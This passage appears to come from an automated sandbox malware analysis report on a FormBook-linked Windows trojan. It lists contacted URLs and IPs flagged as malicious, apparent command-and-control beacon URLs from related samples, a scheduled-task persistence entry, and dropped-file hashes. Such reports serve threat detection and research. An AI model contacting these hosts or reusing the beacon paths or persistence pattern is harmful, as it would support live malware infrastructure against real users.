https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.dianetion.comReferer:	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.batuoe.comReferer:	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.harborspringsfire.comReferer:	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/bThe	22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.v72999.com	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000007.00000000.1654571205.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
https://powerpoint.office.comcember	explorer.exe, 00000007.00000000.1661162254.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2882270142.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.survivordental.com/gy14/	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.tiro.com	22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.artbydianayorktownva.com	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000007.00000002.2876000518.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2878928889.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.2876563487.0000000008720000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zom11.com/gy14/	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.typography.netD	22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	22#U0415.exe, 00000000.00000002.1675005737.0000000008E52000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zom11.comReferer:	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.survivordental.com/gy14/www.tulisanemas.com	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.batuoe.com	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.theanhedonia.com	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.tulisanemas.com	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://tempuri.org/QLTLDataSet.xsd	tsnokiirph.exe, 00000008.00000002.1701973301.00000000033D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/q	explorer.exe, 00000007.00000000.1656778904.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2877317802.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.zezfhys.com/gy14/www.zom11.com	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.v72999.com/gy14/	explorer.exe, 00000007.00000002.2884416246.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	explorer.exe, 00000007.00000002.2873939169.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1654571205.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
103.224.212.212	www.theanhedonia.com	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
23.80.45.39	www.v72999.com	United States	395954	LEASEWEB-USA-LAX-11US	true
15.197.142.173	alterdpxlmarketing.com	United States	7430	TANDEMUS	true

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1353855
Start date and time:	2023-12-05 10:42:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	22#U0415.exe renamed because original name is a hash value
Original Sample Name:	__.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@189/11@4/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 133 Number of non-executed functions: 315
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:42:56	Task Scheduler	Run new task: tsnokiirph path: C:\Users\user\AppData\Roaming\tsnokiirph.exe
10:42:54	API Interceptor	1x Sleep call for process: 22#U0415.exe modified
10:42:55	API Interceptor	12x Sleep call for process: powershell.exe modified
10:42:56	API Interceptor	1x Sleep call for process: tsnokiirph.exe modified
10:43:01	API Interceptor	2230837x Sleep call for process: explorer.exe modified
10:43:38	API Interceptor	2952868x Sleep call for process: systray.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
103.224.212.212	RFQ-T56797W_1.xlsx	Get hash	malicious	FormBook, NSISDropper	Browse	www.narrativepages.com/ge06/?6l58L2=/ya+08xkyOEL3z3mbFI+CcZs6Ll5ZIz+eS70dlN8tW9HOdaiVOhFBqrIR4wo06Sw4yKSnA==&BL3=KP-PB41
	GCeHcfCef8.exe	Get hash	malicious	FormBook	Browse	www.fhstbanknigeria.com/rs10/?s0=3hcrZOpg0bcnkhh15AgNBYOBAaFzA2w39b7OLOTzLX17gT7vmmZNER029cGGSq2teP1k&CB_=7nEpdJs
	Audit_Confirmation_pdf.exe	Get hash	malicious	FormBook	Browse	www.brynnwpods.com/ls02/?U2MTG=IjLtFX-X1ru86jf&rrn=BOXRJAyFp7ak5hNUAxrCPIqjpri6yIqDhPKfVNEe46v/rpGYXPOMCZCFlinyM3iKXNZy
	SWIFT_LETTER_A1OzGLOB0NH2.exe	Get hash	malicious	FormBook	Browse	www.brynnwpods.com/ls02/?GxoHR=VBjPa4VPhFxDNPj&_ZApkb=BOXRJAyFp7ak5hNUAxrCPIqjpri6yIqDhPKfVNEe46v/rpGYXPOMCZCFlhHtHXyyNqk4
23.80.45.39	TR#U00cdCH_D#U1eaaN.exe	Get hash	malicious	FormBook	Browse	www.v72999.com/gy14/?fp=FjYtDtR&E8O=y7EXzclmIHvBTT0yAvAId1VUK6tUhu58CGMbocv7TQhRUEwsApxFieb+ctfYAFSpBwLX
15.197.142.173	transfer_12.4.2023.PDF.exe	Get hash	malicious	FormBook	Browse	www.truthsunveiled.net/ui23/?9r=gPNyu7DOpfLZVD1/CalBFldwe9x1GIcAF3g2BtFQIHomBXPLqKJwmWEk7+IdKTQVzRSKfOkkhw==&pPU=vTR8zRxXinfLUV1
	Znuvgbtsedoszb.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.edge-estimates.info/fadc/?LN9X=IxyJOpPgZyJ6eXteNlidE1WopfomHYjW9kps+aKfb6mD+IDXqQMxE63mc2cP3qVbg1ElbhOvuw==&3fvp=i6JhRlXxg8iTZVrP
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	malibusands.net/admin
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	cnjewellers.com/admin.php
	transfer_2023.11.30.exe	Get hash	malicious	FormBook	Browse	www.truthsunveiled.net/ui23/?-Z509bd=gPNyu7DOpfLZVD1/CalBFldwe9x1GIcAF3g2BtFQIHomBXPLqKJwmWEk7+IkViwW9HONfOkjyA==&4hr=j2Jx5pX8Mh_0inV0
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	chaipoint.com/pma/
	file.exe	Get hash	malicious	BitCoin Miner, RedLine, SmokeLoader	Browse	irswaste.com/pma/
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	m7l.com/pma/
	mZoYf6Nezj.exe	Get hash	malicious	FormBook	Browse	www.shruvish.com/o07d/?txo8=+yjsZPgdlviEILy4h3v8d7I4Zby9TFTcO/r4xgxzi8IDICKDLgaFuVANvOa8VB+J9GWb&qPF=XvDXfbThHJLxaDup
	58l8BPvbLr.exe	Get hash	malicious	FormBook	Browse	www.alkemymedia.com/o6g2/?G8Ox3p=TcJYskQZJUzQKPbrB2cxRl9kId57yTXFVFYjHWTp5yRmnjhpjUrDIK2ABuSno9wjNn3z&qPf=9r4DB
	klWGq3yDcQ.exe	Get hash	malicious	Unknown	Browse	greenrworld.com/admin.php
	14020611jpg.exe	Get hash	malicious	FormBook, DBatLoader	Browse	www.chicagocarpetcleaneril.com/kmge/
	Prd_Raw_Material_Requisition.doc	Get hash	malicious	FormBook	Browse	www.alkemymedia.com/o6g2/?3fz=TcJYskQZVE3UKvTsD2cxRl9kId57yTXFVFAzbVPo9SRnnSNvkE6PeOOCCL+bzdEQCmiDyQ==&ArqLU=XJE0fB_pPx1
	E-dekont.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.monkeesofmurfreesboro.com/ay62/?Ep=nhRlHn&lfsd=LMaK1EYmE1riZX+dyXfO5diJjvXs2IeIfqPjEBH2GgYYODuxpft4kgAn2wcnwPhnkqbk
	#U00d6denmemi#U015f_#U00d6demelerin_Kapat#U0131lmas#U0131.exe	Get hash	malicious	FormBook	Browse	www.alterdpxlmarketing.com/gy14/?j2Jxo=YTjTk4IHn&02=J9/jgP9Re4KtuF0AsBPpjtalVscOAyQ/qvU9Qh627akK0Y3++VNxqCagaMddKEOxon78
	Statement_Pdf.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.orlandosfencing.com/st58/?w2Jp=bQuCANzaOZ82Zm8k+AePt1HaZhBSxDxvAWHAW7Sl8Iqd0j9F5P8lOghMQAX+DIKClM5Q&RRc=nN90b2
	THP-20381508-2023NP.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.orlandosfencing.com/st58/?vT=bQuCANzaOZ82Zm8k+AePt1HaZhBSxDxvAWHAW7Sl8Iqd0j9F5P8lOghMQAX+DIKClM5Q&S2M8J8=RdEHspH0oFo8
	Receipt_91888_PDF.exe	Get hash	malicious	FormBook	Browse	www.emsculptcenterofne.com/he2a/?Ej=nhNBuRkoNWOxJDiZ227X18Db1Kxbenb5b3vHQO2tFDH+XtD98Je8GVRwkFt4AbcQeHAu&ohPd=S8q0RfV
	Receipt!!_PDF.exe	Get hash	malicious	FormBook	Browse	www.emsculptcenterofne.com/he2a/?qToT_p=MZutCv204d4XkF&6ltpe=nhNBuRlcN2LBUz/tqG7X18Db1Kxbenb5b3vHQO2tFDH+XtD98Je8GVRwkF5SAfIuZ1Yu
	file.exe	Get hash	malicious	FormBook	Browse	www.thequickstartpromptguide.com/u29r/?AxoLm=YbmsMXdDpvFqzCQbj5qW8doDfgPscxV66nSCBk5y4z+UOcebdhgrnZXNGQNV7EH0otJfqrgYWA==&bh=U4kp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.v72999.com	TR#U00cdCH_D#U1eaaN.exe	Get hash	malicious	FormBook	Browse	23.80.45.39

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LEASEWEB-USA-LAX-11US	TR#U00cdCH_D#U1eaaN.exe	Get hash	malicious	FormBook	Browse	23.80.45.39
	uOBk3ireTS.elf	Get hash	malicious	Mirai	Browse	172.255.161.162
	wechat_XC560-1.exe	Get hash	malicious	Unknown	Browse	23.83.76.57
	z1ORDENDECOMPRAURGENTEpdf.exe	Get hash	malicious	FormBook	Browse	192.229.64.169
	klWGq3yDcQ.exe	Get hash	malicious	Unknown	Browse	108.62.103.193
	https://www.ukotayc.online/login	Get hash	malicious	Unknown	Browse	23.83.76.58
	https://www.kmb.net.cn/login	Get hash	malicious	Unknown	Browse	23.83.76.90
	https://www.ghnrsaxer.icu/login	Get hash	malicious	Unknown	Browse	23.83.76.58
	arm7.elf	Get hash	malicious	Mirai	Browse	23.87.149.64
	Sea_Waybill,_Certificate_Of_Origin,_Invoice_&_PL.exe	Get hash	malicious	FormBook	Browse	142.91.131.133
	SHIPPING_DOCUMENTS.exe	Get hash	malicious	FormBook	Browse	142.91.131.133
	PbuHBAK54f.elf	Get hash	malicious	Mirai	Browse	142.234.167.111
	https://znxbamdkwjcbas2562.top/	Get hash	malicious	HTMLPhisher	Browse	23.83.76.89
	0MNcEkBEXT.elf	Get hash	malicious	Mirai	Browse	23.83.26.218
	Docxc-xerox-Printinvoice.exe	Get hash	malicious	FormBook	Browse	142.91.131.133
	SecuriteInfo.com.Win32.RATX-gen.5138.32043.exe	Get hash	malicious	FormBook	Browse	142.91.131.133
	https://qrco.de/beXnxB	Get hash	malicious	HTMLPhisher	Browse	23.83.76.64
	B3dZfZRKxF.elf	Get hash	malicious	Mirai	Browse	23.87.149.89
	http://dalinoxin.de	Get hash	malicious	Unknown	Browse	23.83.76.53
	SecuriteInfo.com.Win32.PWSX-gen.25615.22763.exe	Get hash	malicious	FormBook	Browse	142.91.131.133
TRELLIAN-AS-APTrellianPtyLimitedAU	http://hyrdroru.com/jr.php	Get hash	malicious	Unknown	Browse	103.224.182.206
	base_(2).apk	Get hash	malicious	Unknown	Browse	103.224.212.217
	mZoYf6Nezj.exe	Get hash	malicious	FormBook	Browse	103.224.212.210
	http://www.portiskountrykitchen.com/?fbclid=IwAR1zRbWZODLeR28at1-53S-fOgrqzjSt9BqvaDg75zQ5GDfq8WjgiEnJfqw	Get hash	malicious	Unknown	Browse	103.224.182.240
	http://www.portiskountrykitchen.com/img/tomcat.png	Get hash	malicious	Unknown	Browse	103.224.182.240
	http://www.portiskountrykitchen.com/img/launch-button-big.gif	Get hash	malicious	Unknown	Browse	103.224.182.240
	http://www.portiskountrykitchen.com/favicon.ico	Get hash	malicious	Unknown	Browse	103.224.182.240
	http://www.portiskountrykitchen.com/bitnami.css	Get hash	malicious	Unknown	Browse	103.224.182.240
	PO#CR21-1178321.exe	Get hash	malicious	FormBook	Browse	103.224.212.216
	UgHXEfw1uL.exe	Get hash	malicious	FormBook	Browse	103.224.212.216
	klWGq3yDcQ.exe	Get hash	malicious	Unknown	Browse	103.224.212.226
	http://uploaddeimagens.com	Get hash	malicious	Unknown	Browse	103.224.182.242
	Proforma_Invoice.exe	Get hash	malicious	DBatLoader, FormBook	Browse	103.224.212.213
	#U00d6denmemi#U015f_#U00d6demelerin_Kapat#U0131lmas#U0131.exe	Get hash	malicious	FormBook	Browse	103.224.212.214
	https://url9904.allianzshop.weiterdev.com/ls/click?upn=RGho9I4a637pjAbXihR4ztLDzowF0Y22I1ZtfXCn-2Bdhunnz-2F8Qn-2BUmfNtE7VuuDX13mDpQ2VyGLtMEqO7v6kKUJaXQ4OGNCSimmImzq9zWH64R-2FyXxFygBgnaT3ua5BaI7sl_MMWsQ8icjIJNEHnGJhggT2lpN31vQLSGSovHuEDboJYYFalg5pwaGrQWEum-2Fd0dEIwDdtBdG4u8CoxX9Ttk0Ivzb7sXwgfshPSFVuDNWq-2BU84QK33HI4I8PDBrnC9z6CqCvVhwhywRtGELrxDAJbfCE0HymVaVqD5jyFk8KpPno1OVnwkXQqJ1K9whANZduuiXZJyav-2BTDvp1zo2VGtQMw-3D-3D	Get hash	malicious	HTMLPhisher	Browse	103.224.212.216
	ekstre.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.224.212.217
	ywkyQKUlD3.exe	Get hash	malicious	Sodinokibi	Browse	103.224.212.217
	https://seminovos.com.br/noticias/wp-includes/blocks/column/sm13/n.php?id=n064r50n	Get hash	malicious	HTMLPhisher	Browse	103.224.212.216
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.12982.22974.rtf	Get hash	malicious	FormBook	Browse	103.224.212.215
	RFQ-T56797W_1.xlsx	Get hash	malicious	FormBook, NSISDropper	Browse	103.224.212.212
TANDEMUS	FacFiscalDigitalenmi6Q8V_C(549).PDF.vbs	Get hash	malicious	Unknown	Browse	15.197.130.221
	transfer_12.4.2023.PDF.exe	Get hash	malicious	FormBook	Browse	15.197.142.173
	wechat_XC560-1.exe	Get hash	malicious	Unknown	Browse	15.197.193.217
	Znuvgbtsedoszb.exe	Get hash	malicious	DBatLoader, FormBook	Browse	15.197.142.173
	t.apk	Get hash	malicious	Octo	Browse	15.197.130.221
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	15.197.142.173
	http://nxct.tk88bet.net/4zJYac1880nQBL207efjfvpvwyz14480MZAAMHPJBIGUMNT289032HZPX7712b12	Get hash	malicious	Phisher	Browse	15.197.253.187
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	15.197.148.33
	transfer_2023.11.30.exe	Get hash	malicious	FormBook	Browse	15.197.142.173
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	15.197.142.173
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	15.197.142.173
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	15.197.148.33
	file.exe	Get hash	malicious	BitCoin Miner, RedLine, SmokeLoader	Browse	15.197.142.173
	file.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	15.197.204.56
	mZoYf6Nezj.exe	Get hash	malicious	FormBook	Browse	15.197.142.173
	https://rebrand.ly/99331b	Get hash	malicious	HTMLPhisher	Browse	15.197.137.111
	6.vbs	Get hash	malicious	Unknown	Browse	15.197.130.221
	http://outlook.reactivar.msw3icr3136.iceiy.com/login.live.com_login_verify_credentials_outlook.html?i=3	Get hash	malicious	Unknown	Browse	15.197.193.217
	winrar-x64.exe	Get hash	malicious	Unknown	Browse	15.197.137.111
	58l8BPvbLr.exe	Get hash	malicious	FormBook	Browse	15.197.142.173

Process:	C:\Users\user\Desktop\22#U0415.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tsnokiirph.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\tsnokiirph.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379736180876081
Encrypted:	false
SSDEEP:	48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZeUyus:tLHyIFKL3IZ2KRH9Ougos
MD5:	9D384A9EBEABB083763926A2E63505A6
SHA1:	3AB2DD8F7518A36D7E22EFD76FF25F3DFA25D889
SHA-256:	801BC488523F40135A2F58EE86844AD3AFD2EFD0AF5DD0F7DE40978E7EDE92DD
SHA-512:	03941519E7F748E7A151CDEFC2E6D98A19B2E077AB09C48822B3882D8BA39C8427A9766C26B3F28DB419385FD7F030C3A7D5FE5ADE4F796AE876921042F5FED9
Malicious:	false
Preview:	@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32tmh1vc.pzb.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cunlwazf.yu4.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jxpq1gou.ssk.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
